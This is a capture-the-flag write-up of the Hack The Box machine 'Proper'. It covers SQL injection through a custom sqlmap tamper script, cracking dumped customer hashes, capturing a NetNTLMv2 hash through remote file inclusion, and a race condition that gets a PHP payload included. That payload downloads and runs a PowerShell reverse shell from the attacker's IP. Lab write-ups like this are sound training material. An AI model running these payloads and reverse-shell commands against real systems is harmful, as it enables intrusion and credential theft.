Hack The Box - Proper

Posted on | In

info_card

User

Proper is a hard rated machine on HackTheBox created by xct & jkr. For the user part we will abuse a SQLI in a web application. This leaves us with credentials to log into a licensing portal which is vulnerable to RFI. With the RFI we can obtain the NetNTMLv2 hash of the web user which is crackable. The RFI is coupled with another vulnerability where the file is passed to the php include function. A check for php tags is insecurely implemented and we can abuse a race condition to get RCE on the target leading to a reverse shell. To obtain system we will abuse a custom cleanup binary in two slightly different ways. First we will interact directly with the named pipe to clean and restore the root.txt. Lastly we will use a tool by xct to abuse the arbitrary file write and get a reverse shell as SYSTEM.

Nmap

As usual we start our enumeration off with a nmap scan against all ports, followed by a script and version detection scan against the open ones to get a full picture of the attack surface.

All ports

1
2
3
4
5
6
7
8
9
$ sudo nmap -p- -T4 10.129.34.116
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-13 06:40 GMT
Nmap scan report for 10.129.34.116
Host is up (0.056s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 160.65 seconds

Script and version

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ sudo nmap -p80 -sC -sV 10.129.34.116
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-13 06:43 GMT
Nmap scan report for 10.129.34.116
Host is up (0.027s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: OS Tidy Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.58 seconds

SQLI

There is only http on the machine open, which makes it obvious what to poke at. Browsing to the homepage we see the company website of OS TIDY.

home

Running a gobuster scan against it we can retrieve the licenses page.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -u http://10.129.34.116/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.34.116/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/13 07:17:49 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 151] [--> http://10.129.34.116/assets/]
/.                    (Status: 200) [Size: 14257]
/licenses             (Status: 301) [Size: 153] [--> http://10.129.34.116/licenses/]

===============================================================
2021/08/13 07:19:35 Finished
===============================================================

Going there we need to be authenticated though.

licenses

Checking the source code of the homepage we see it loads resources with a php script.

home_source

Going there directly we see all products being displayed.

query

Curling the website leaving the second parameter out we get an interesting error message with a SECURE_PARAM_SALT, which seems to be used to create the hash in the h parameter of the request.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ curl 'http://10.129.34.116/products-ajax.php?order=id+asc'
<!-- [8] Undefined index: h
On line 6 in file C:\inetpub\wwwroot\products-ajax.php
  1 |   // SECURE_PARAM_SALT needs to be defined prior including functions.php
  2 |   define('SECURE_PARAM_SALT','hie0shah6ooNoim');
  3 |   include('functions.php');
  4 |   include('db-config.php');
  5 |   if ( !$_GET['order'] || !$_GET['h'] ) {                <<<<< Error encountered in this line.
  6 |     // Set the response code to 500
  7 |     http_response_code(500);
  8 |     // and die(). Someone fiddled with the parameters.
  9 |     die('Parameter missing or malformed.');
 10 |   }
 11 |
// -->
Parameter missing or malformed.

Changing the order of the sql query and hashing it with the salt we see all items now in reverse order, proving we can execute sql commands on the server.

1
2
$ echo -n 'hie0shah6ooNoimid asc'| md5sum
181345bd7fce37aad011ea65a41b60c8  -

query_reverse

To dump the database with sqlmap we create a short custom tamper script which takes the payload, hashes it with the salt and urlencodes it.

tamper.py

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/usr/bin/env python

import urllib
from hashlib import md5


def tamper(payload, **kwargs):
    salt = 'hie0shah6ooNoim'
    hashed = md5((salt + payload).encode()).hexdigest()
    payload = urllib.parse.quote(payload)
    payload += '&h='
    payload += hashed
    return payload

For the tamper script to work we also have to create an empty __init__.py in the same directory.

1
$ touch __init__.py

Running sqlmap with the tamper script it identifies the injection point.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
$ sqlmap -u 'http://10.129.34.116/products-ajax.php?order=id' --skip-urlencode --tamper=tamper.py --level 5 --risk 3
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not re
sponsible for any misuse or damage caused by this program

[*] starting @ 06:55:21 /2021-08-13/

[06:55:21] [INFO] loading tamper module 'tamper'
[06:55:21] [INFO] testing connection to the target URL
[06:55:21] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[06:55:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[06:55:21] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] y
[06:55:24] [INFO] testing if the target URL content is stable
[06:55:24] [INFO] target URL content is stable
[06:55:24] [INFO] testing if GET parameter 'order' is dynamic
[06:55:24] [INFO] GET parameter 'order' appears to be dynamic
[06:55:24] [WARNING] heuristic (basic) test shows that GET parameter 'order' might not be injectable
[06:55:24] [INFO] testing for SQL injection on GET parameter 'order'
[06:55:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:55:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[06:55:33] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[06:55:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[06:55:39] [INFO] GET parameter 'order' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --code=200)
[06:55:40] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[06:55:44] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
...[snip]...
[06:55:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[06:55:55] [INFO] GET parameter 'order' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[06:55:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
...[snip]...
[06:56:13] [INFO] checking if the injection point on GET parameter 'order' is a false positive
GET parameter 'order' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests:
---
Parameter: order (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: order=id AND 6906=(SELECT (CASE WHEN (6906=6906) THEN 6906 ELSE (SELECT 4848 UNION SELECT 4393) END))-- WNvX

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: order=id AND (SELECT 7711 FROM (SELECT(SLEEP(5)))aUNf)
---
[06:56:19] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[06:56:19] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2016 or 10 or 2019
web application technology: Microsoft IIS 10.0, PHP 7.4.1
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[06:56:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 791 times
[06:56:19] [INFO] fetched data logged to text files under '/home/jack/.local/share/sqlmap/output/10.129.34.116'

[*] ending @ 06:56:19 /2021-08-13/

In another run we dump the database scheme.

1
2
3
4
5
6
7
$ sqlmap -u 'http://10.129.34.116/products-ajax.php?order=id' --skip-urlencode --tamper=tamper.py --level 5 --risk 3 --dbs
...[snip]...
available databases [3]:
[*] cleaner
[*] information_schema
[*] test
...[snip]...

Then the tables in the cleaner db.

1
2
3
4
5
6
7
8
9
10
$ sqlmap -u 'http://10.129.34.116/products-ajax.php?order=id' --skip-urlencode --tamper=tamper.py --level 5 --risk 3 -D cleaner --tables
...[snip]...
Database: cleaner
[3 tables]
+-----------+
| customers |
| licenses  |
| products  |
+-----------+
...[snip]...

And finally dump all information from the customers table. We select yes when we are prompted if we want to store the hashes to a temporary file to crack them later with hashcat.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
$ sqlmap -u 'http://10.129.34.116/products-ajax.php?order=id' --skip-urlencode --tamper=tamper.py --level 5 --risk 3 -D cleaner -T customers --dump
...[snip]...
[07:03:01] [INFO] retrieved: 1
[07:03:04] [INFO] retrieved: vikki.solomon@throwaway.mail
[07:03:12] [INFO] retrieved: 7c6a180b36896a0a8c02787eeafb0e4c
[07:03:23] [INFO] retrieved: Neave Stone
...[snip]...
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[07:15:08] [INFO] writing hashes to a temporary file '/tmp/sqlmapvbm4e_4g4082/sqlmaphashes-lfrjskex.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: cleaner
Table: customers
[29 entries]
+----+------------------------------+----------------------------------+----------------------+
| id | login                        | password                         | customer_name        |
+----+------------------------------+----------------------------------+----------------------+
| 1  | vikki.solomon@throwaway.mail | 7c6a180b36896a0a8c02787eeafb0e4c | Vikki Solomon        |
| 2  | nstone@trashbin.mail         | 6cb75f652a9b52798eb6cf2201057c73 | Neave Stone          |
| 3  | bmceachern7@discovery.moc    | e10adc3949ba59abbe56e057f20f883e | Bertie McEachern     |
| 4  | jkleiser8@google.com.xy      | 827ccb0eea8a706c4c34a16891f84e7b | Jordana Kleiser      |
| 5  | mchasemore9@sitemeter.moc    | 25f9e794323b453885f5181f1b624d0b | Mariellen Chasemore  |
| 6  | gdornina@marriott.moc        | 5f4dcc3b5aa765d61d8327deb882cf99 | Gwyneth Dornin       |
| 7  | itootellb@forbes.moc         | f25a2fc72690b780b2a14e140ef6a9e0 | Israel Tootell       |
| 8  | kmanghamc@state.tx.su        | 8afa847f50a716e64932d995c8e7435a | Karon Mangham        |
| 9  | jblinded@bing.moc            | fcea920f7412b5da7be0cf42b8c93759 | Janifer Blinde       |
| 10 | llenchenkoe@macromedia.moc   | f806fc5a2a0d5ba2471600758452799c | Laurens Lenchenko    |
| 11 | aaustinf@booking.moc         | 25d55ad283aa400af464c76d713c07ad | Andreana Austin      |
| 12 | afeldmesserg@ameblo.pj       | e99a18c428cb38d5f260853678922e03 | Arnold Feldmesser    |
| 13 | ahuntarh@seattletimes.moc    | fc63f87c08d505264caba37514cd0cfd | Adella Huntar        |
| 14 | talelsandrovichi@tamu.ude    | aa47f8215c6f30a0dcdb2a36a9f4168e | Trudi Alelsandrovich |
| 15 | ishayj@dmoz.gro              | 67881381dbc68d4761230131ae0008f7 | Ivy Shay             |
| 16 | acallabyk@un.gro             | d0763edaa9d9bd2a9516280e9044d885 | Alys Callaby         |
| 17 | daeryl@about.you             | 061fba5bdfc076bb7362616668de87c8 | Dorena Aery          |
| 18 | aalekseicikm@skyrock.moc     | aae039d6aa239cfc121357a825210fa3 | Amble Alekseicik     |
| 19 | lginmann@lycos.moc           | c33367701511b4f6020ec61ded352059 | Lin Ginman           |
| 20 | lgiorioo@ow.lic              | 0acf4539a14b3aa27deeb4cbdf6e989f | Letty Giorio         |
| 21 | lbyshp@wired.moc             | adff44c5102fca279fce7559abf66fee | Lazarus Bysh         |
| 22 | bklewerq@yelp.moc            | d8578edf8458ce06fbc5bb76a58c5ca4 | Bud Klewer           |
| 23 | wstrettellr@senate.gov       | 96e79218965eb72c92a549dd5a330112 | Woodrow Strettell    |
| 24 | lodorans@kickstarter.moc     | edbd0effac3fcc98e725920a512881e0 | Lila O Doran         |
| 25 | bpfeffelt@artisteer.moc      | 670b14728ad9902aecba32e22fa4f6bd | Bibbie Pfeffel       |
| 26 | lgrimsdellu@abc.net.uvw      | 2345f10bb948c5665ef91f6773b3e455 | Luce Grimsdell       |
| 27 | lpealingv@goo.goo            | f78f2477e949bee2d12a2c540fb6084f | Lyle Pealing         |
| 28 | krussenw@mit.ude             | 0571749e2ac330a7455809c6b0e7af90 | Kimmy Russen         |
| 29 | meastmondx@businessweek.moc  | c378985d629e99a4e86213db0cd5e70d | Meg Eastmond         |
+----+------------------------------+----------------------------------+----------------------+

[07:15:35] [INFO] table 'cleaner.customers' dumped to CSV file '/home/jack/.local/share/sqlmap/output/10.129.34.116/dump/cleaner/customers.csv'
[07:15:35] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 7581 times
[07:15:35] [INFO] fetched data logged to text files under '/home/jack/.local/share/sqlmap/output/10.129.34.116'

[*] ending @ 07:15:35 /2021-08-13/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ cat /tmp/sqlmapvbm4e_4g4082/sqlmaphashes-lfrjskex.txt
vikki.solomon@throwaway.mail:7c6a180b36896a0a8c02787eeafb0e4c
nstone@trashbin.mail:6cb75f652a9b52798eb6cf2201057c73
bmceachern7@discovery.moc:e10adc3949ba59abbe56e057f20f883e
jkleiser8@google.com.xy:827ccb0eea8a706c4c34a16891f84e7b
mchasemore9@sitemeter.moc:25f9e794323b453885f5181f1b624d0b
gdornina@marriott.moc:5f4dcc3b5aa765d61d8327deb882cf99
itootellb@forbes.moc:f25a2fc72690b780b2a14e140ef6a9e0
kmanghamc@state.tx.su:8afa847f50a716e64932d995c8e7435a
jblinded@bing.moc:fcea920f7412b5da7be0cf42b8c93759
llenchenkoe@macromedia.moc:f806fc5a2a0d5ba2471600758452799c
aaustinf@booking.moc:25d55ad283aa400af464c76d713c07ad
afeldmesserg@ameblo.pj:e99a18c428cb38d5f260853678922e03
ahuntarh@seattletimes.moc:fc63f87c08d505264caba37514cd0cfd
talelsandrovichi@tamu.ude:aa47f8215c6f30a0dcdb2a36a9f4168e
ishayj@dmoz.gro:67881381dbc68d4761230131ae0008f7
acallabyk@un.gro:d0763edaa9d9bd2a9516280e9044d885
daeryl@about.you:061fba5bdfc076bb7362616668de87c8
aalekseicikm@skyrock.moc:aae039d6aa239cfc121357a825210fa3
lginmann@lycos.moc:c33367701511b4f6020ec61ded352059
lgiorioo@ow.lic:0acf4539a14b3aa27deeb4cbdf6e989f
lbyshp@wired.moc:adff44c5102fca279fce7559abf66fee
bklewerq@yelp.moc:d8578edf8458ce06fbc5bb76a58c5ca4
wstrettellr@senate.gov:96e79218965eb72c92a549dd5a330112
lodorans@kickstarter.moc:edbd0effac3fcc98e725920a512881e0
bpfeffelt@artisteer.moc:670b14728ad9902aecba32e22fa4f6bd
lgrimsdellu@abc.net.uvw:2345f10bb948c5665ef91f6773b3e455
lpealingv@goo.goo:f78f2477e949bee2d12a2c540fb6084f
krussenw@mit.ude:0571749e2ac330a7455809c6b0e7af90
meastmondx@businessweek.moc:c378985d629e99a4e86213db0cd5e70d

Running hashcat with the --user flag all hashes crack quickly and we can display with the --show flag which hashes belong to which user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
$ hashcat --user -m 0 -O hashes rockyou.txt
hashcat (v6.2.3) starting
6cb75f652a9b52798eb6cf2201057c73:password2
e10adc3949ba59abbe56e057f20f883e:123456
827ccb0eea8a706c4c34a16891f84e7b:12345
25f9e794323b453885f5181f1b624d0b:123456789
f25a2fc72690b780b2a14e140ef6a9e0:iloveyou
8afa847f50a716e64932d995c8e7435a:princess
fcea920f7412b5da7be0cf42b8c93759:1234567
f806fc5a2a0d5ba2471600758452799c:rockyou
67881381dbc68d4761230131ae0008f7:babygirl
d0763edaa9d9bd2a9516280e9044d885:monkey
061fba5bdfc076bb7362616668de87c8:lovely
aae039d6aa239cfc121357a825210fa3:jessica
96e79218965eb72c92a549dd5a330112:111111
edbd0effac3fcc98e725920a512881e0:iloveu
670b14728ad9902aecba32e22fa4f6bd:000000
2345f10bb948c5665ef91f6773b3e455:michelle
5f4dcc3b5aa765d61d8327deb882cf99:password
25d55ad283aa400af464c76d713c07ad:12345678
e99a18c428cb38d5f260853678922e03:abc123
fc63f87c08d505264caba37514cd0cfd:nicole
aa47f8215c6f30a0dcdb2a36a9f4168e:daniel
c33367701511b4f6020ec61ded352059:654321
0acf4539a14b3aa27deeb4cbdf6e989f:michael
adff44c5102fca279fce7559abf66fee:ashley
d8578edf8458ce06fbc5bb76a58c5ca4:qwerty
f78f2477e949bee2d12a2c540fb6084f:tigger
0571749e2ac330a7455809c6b0e7af90:sunshine
c378985d629e99a4e86213db0cd5e70d:chocolate
7c6a180b36896a0a8c02787eeafb0e4c:password1

Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: hashes
Time.Started.....: Fri Aug 13 09:19:33 2021 (0 secs)
Time.Estimated...: Fri Aug 13 09:19:33 2021 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 56088.0 kH/s (0.79ms) @ Accel:64 Loops:1 Thr:1024 Vec:1
Recovered........: 29/29 (100.00%) Digests
Progress.........: 655376/14344388 (4.57%)
Rejected.........: 16/655376 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> grapes04
Hardware.Mon.#1..: Temp: 47c Fan: 33% Util: 30% Core:1569MHz Mem:4006MHz Bus:16

Started: Fri Aug 13 09:19:29 2021
Stopped: Fri Aug 13 09:19:34 2021

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ hashcat --user -m 0 -O hashes --show
vikki.solomon@throwaway.mail:7c6a180b36896a0a8c02787eeafb0e4c:password1
nstone@trashbin.mail:6cb75f652a9b52798eb6cf2201057c73:password2
bmceachern7@discovery.moc:e10adc3949ba59abbe56e057f20f883e:123456
jkleiser8@google.com.xy:827ccb0eea8a706c4c34a16891f84e7b:12345
mchasemore9@sitemeter.moc:25f9e794323b453885f5181f1b624d0b:123456789
gdornina@marriott.moc:5f4dcc3b5aa765d61d8327deb882cf99:password
itootellb@forbes.moc:f25a2fc72690b780b2a14e140ef6a9e0:iloveyou
kmanghamc@state.tx.su:8afa847f50a716e64932d995c8e7435a:princess
jblinded@bing.moc:fcea920f7412b5da7be0cf42b8c93759:1234567
llenchenkoe@macromedia.moc:f806fc5a2a0d5ba2471600758452799c:rockyou
aaustinf@booking.moc:25d55ad283aa400af464c76d713c07ad:12345678
afeldmesserg@ameblo.pj:e99a18c428cb38d5f260853678922e03:abc123
ahuntarh@seattletimes.moc:fc63f87c08d505264caba37514cd0cfd:nicole
talelsandrovichi@tamu.ude:aa47f8215c6f30a0dcdb2a36a9f4168e:daniel
ishayj@dmoz.gro:67881381dbc68d4761230131ae0008f7:babygirl
acallabyk@un.gro:d0763edaa9d9bd2a9516280e9044d885:monkey
daeryl@about.you:061fba5bdfc076bb7362616668de87c8:lovely
aalekseicikm@skyrock.moc:aae039d6aa239cfc121357a825210fa3:jessica
lginmann@lycos.moc:c33367701511b4f6020ec61ded352059:654321
lgiorioo@ow.lic:0acf4539a14b3aa27deeb4cbdf6e989f:michael
lbyshp@wired.moc:adff44c5102fca279fce7559abf66fee:ashley
bklewerq@yelp.moc:d8578edf8458ce06fbc5bb76a58c5ca4:qwerty
wstrettellr@senate.gov:96e79218965eb72c92a549dd5a330112:111111
lodorans@kickstarter.moc:edbd0effac3fcc98e725920a512881e0:iloveu
bpfeffelt@artisteer.moc:670b14728ad9902aecba32e22fa4f6bd:000000
lgrimsdellu@abc.net.uvw:2345f10bb948c5665ef91f6773b3e455:michelle
lpealingv@goo.goo:f78f2477e949bee2d12a2c540fb6084f:tigger
krussenw@mit.ude:0571749e2ac330a7455809c6b0e7af90:sunshine
meastmondx@businessweek.moc:c378985d629e99a4e86213db0cd5e70d:chocolate

RFI

Taking the first email and password from the list we are now able to log into the licensing portal.

licenses_in

In the portal we can select a theme which has the same url scheme as the products before. Since it seems to be a template file which is loaded we can check for RFI in the next step.

licenses_themes

To generate the hashes we make some minor changes to our tamper script.

gen.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/usr/bin/env python

import urllib
from hashlib import md5


def tamper(payload):
    salt = 'hie0shah6ooNoim'
    hashed = md5((salt + payload).encode()).hexdigest()
    payload += '&h='
    payload += hashed
    print(payload)

while True:
    tamper(input())

Since it is a windows machine it might be likely that we are able to include a remote share. For this we first create the query parameter.

1
2
3
$ python gen.py
//10.10.14.65/files
//10.10.14.65/files&h=6eb413f74863f387e709ec56f0bb4ea3

Then we set up responder to listen on the vpn interface.

1
$ sudo responder -I tun0

Sending the request in burp we get another interesting error message which reveals the source code of the function. The php script invokes file_get_contents and include on a header.inc file in the remote share.

functions_error

Looking at responder it made a connection back to us and we were able to capture the NetNTLMv2 hash.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ sudo responder -I tun0
...[snip]...
[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.65]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-KR8FRWIT0N3]
    Responder Domain Name      [HVNG.LOCAL]
    Responder DCE-RPC Port     [48885]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.34.116
[SMB] NTLMv2-SSP Username : PROPER\web
[SMB] NTLMv2-SSP Hash     : web::PROPER:4a03f57a9cc89134:1E0BE948C7D80024E490944B10BE8D02:01010000000000000043D9581790D7016E15EC3D08A6A2380000000002000800480056004E00470001001E00570049004E002D004B00520038004600520057004900540030004E00330004003400570049004E002D004B00520038004600520057004900540030004E0033002E00480056004E0047002E004C004F00430041004C0003001400480056004E0047002E004C004F00430041004C0005001400480056004E0047002E004C004F00430041004C00070008000043D9581790D7010600040002000000080030003000000000000000000000000020000049549CCAE5835316E2923FE93DC949D4C6D0C7585FF7238BBC5C65DA61C50F960A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00360035000000000000000000
[*] Skipping previously captured hash for PROPER\web
[*] Skipping previously captured hash for PROPER\web
[*] Skipping previously captured hash for PROPER\web
[*] Skipping previously captured hash for PROPER\web
[*] Skipping previously captured hash for PROPER\web
[*] Skipping previously captured hash for PROPER\web
[*] Skipping previously captured hash for PROPER\web
[*] Skipping previously captured hash for PROPER\web
...[snip]...

This hash is also quickly crackable using hashcat leaving us with the credentials for the WEB user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ hashcat -m 5600 -O hash rockyou.txt
hashcat (v6.2.3) starting
...[snip]...
WEB::PROPER:4a03f57a9cc89134:1e0be948c7d80024e490944b10be8d02:01010000000000000043d9581790d7016e15ec3d08a6a2380000000002000800480056004e00470001001e00570049004e002d004b00520038004600520057004900540030004e00330004003400570049004e002d004b00520038004600520057004900540030004e0033002e00480056004e0047002e004c004f00430041004c0003001400480056004e0047002e004c004f00430041004c0005001400480056004e0047002e004c004f00430041004c00070008000043d9581790d7010600040002000000080030003000000000000000000000000020000049549ccae5835316e2923fe93dc949d4c6d0c7585ff7238bbc5c65da61c50f960a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360035000000000000000000:charlotte123!

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: WEB::PROPER:4a03f57a9cc89134:1e0be948c7d80024e49094...000000
Time.Started.....: Fri Aug 13 09:47:05 2021 (0 secs)
Time.Estimated...: Fri Aug 13 09:47:05 2021 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 21344.4 kH/s (2.06ms) @ Accel:64 Loops:1 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1310796/14344388 (9.14%)
Rejected.........: 76/1310796 (0.01%)
Restore.Point....: 655386/14344388 (4.57%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: grantham1 -> saylove
Hardware.Mon.#1..: Temp: 47c Fan: 33% Util: 17% Core:1569MHz Mem:4006MHz Bus:16

Started: Fri Aug 13 09:47:04 2021
Stopped: Fri Aug 13 09:47:07 2021

In a first test we create a header.inc file with arbitrary content and serve it with impacket’s smbserver in the same directory.

1
$ echo test > header.inc

1
$ sudo smbserver.py -smb2support files .

Sending the request in burp it seems like it failed however. Looking at the output of smbserver.py we see it did not make a full connection to our share.

share_failed

1
2
3
4
5
6
7
8
9
10
11
12
13
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.34.116,49379)
[*] AUTHENTICATE_MESSAGE (PROPER\web,PROPER)
[*] User PROPER\web authenticated successfully
[*] web::PROPER:aaaaaaaaaaaaaaaa:2a60597af90745e58c456d6a9ec4cc97:0101000000000000808693551a90d7016474039ed7ee4db60000000001001000780073007a00730077004f0042007200020010006b005600730075005a0064005500790003001000780073007a00730077004f0042007200040010006b005600730075005a0064005500790007000800808693551a90d7010600040002000000080030003000000000000000000000000020000049549ccae5835316e2923fe93dc949d4c6d0c7585ff7238bbc5c65da61c50f960a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360035000000000000000000
[*] Closing down connection (10.129.34.116,49379)

Since authentication might be required and we have the credentials for the user the service is running as, we restart our smbserver with the credentials for WEB.

1
1
$ sudo smbserver.py -smb2support -user web -password 'charlotte123!' files .

Sending the request again in burp it succeeds this time and we included the content of our earlier created header.inc

share_success

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ sudo smbserver.py -smb2support -user web -password 'charlotte123!' files .
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.34.116,49382)
[*] AUTHENTICATE_MESSAGE (PROPER\web,PROPER)
[*] User PROPER\web authenticated successfully
[*] web::PROPER:aaaaaaaaaaaaaaaa:45fd8db7aab81ee5b82347e05351f8fb:010100000000000080eb60731a90d7019a81a0f138a274b200000000010010006800490059006c0051006c0053006f000200100062005500730072006800510066006e00030010006800490059006c0051006c0053006f000400100062005500730072006800510066006e000700080080eb60731a90d7010600040002000000080030003000000000000000000000000020000049549ccae5835316e2923fe93dc949d4c6d0c7585ff7238bbc5c65da61c50f960a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360035000000000000000000
[*] Connecting Share(1:FILES)
[*] Disconnecting Share(1:FILES)
[*] Closing down connection (10.129.34.116,49382)
[*] Remaining connections []

Race condition

Since our content is passed to include we want to get it to include php code which needs the <? tags. The function that does the filtering calls the file two times. Since there is some minor delay between this we might be able to exchange the content in between.

For this we create some php code calling system, downloading and invoking our nishang powershell reverse shell.

download.php

1
<?php system("powershell iex(new-object net.webclient).downloadstring('http://10.10.14.65/rev.ps1')"); ?>

We use the Invoke-PowerShellTcp.ps1 shell and add the invocation to the last line of the file with our vpn ip and the port we want to recieve the shell on.

1
$ cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1

1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.65 -Port 443

Then we set up a python webserver serving our reverse shell and a ncat listener to recieve it.

1
2
$ sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

1
2
3
4
$ sudo nc -lnvp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

We also need to create a harmless dummy file which passes the check for the <? tags.

1
$ echo dummy > valid

With preparations met we start our smbserver with username and password again.

1
1
$ sudo smbserver.py -smb2support -user web -password 'charlotte123!' files .

To exchange the files we use a simple bash loop to copy our php file and the dummy file over header.inc in the directory where our smbserver is serving.

1
$ while :;do cp valid ../header.inc; cp download.php ../header.inc; done

Since race condition are often not the most stable to exploit we now loop the curl request, including our session cookie, to trigger the RFI.

1
$ while :;do curl -s -b 'PHPSESSID=esqhprl6099rfo3unap3neq9fc' 'http://10.129.34.116/licenses/licenses.php?theme=//10.10.14.65/files&h=6eb413f74863f387e709ec56f0bb4ea3' >/dev/null; done

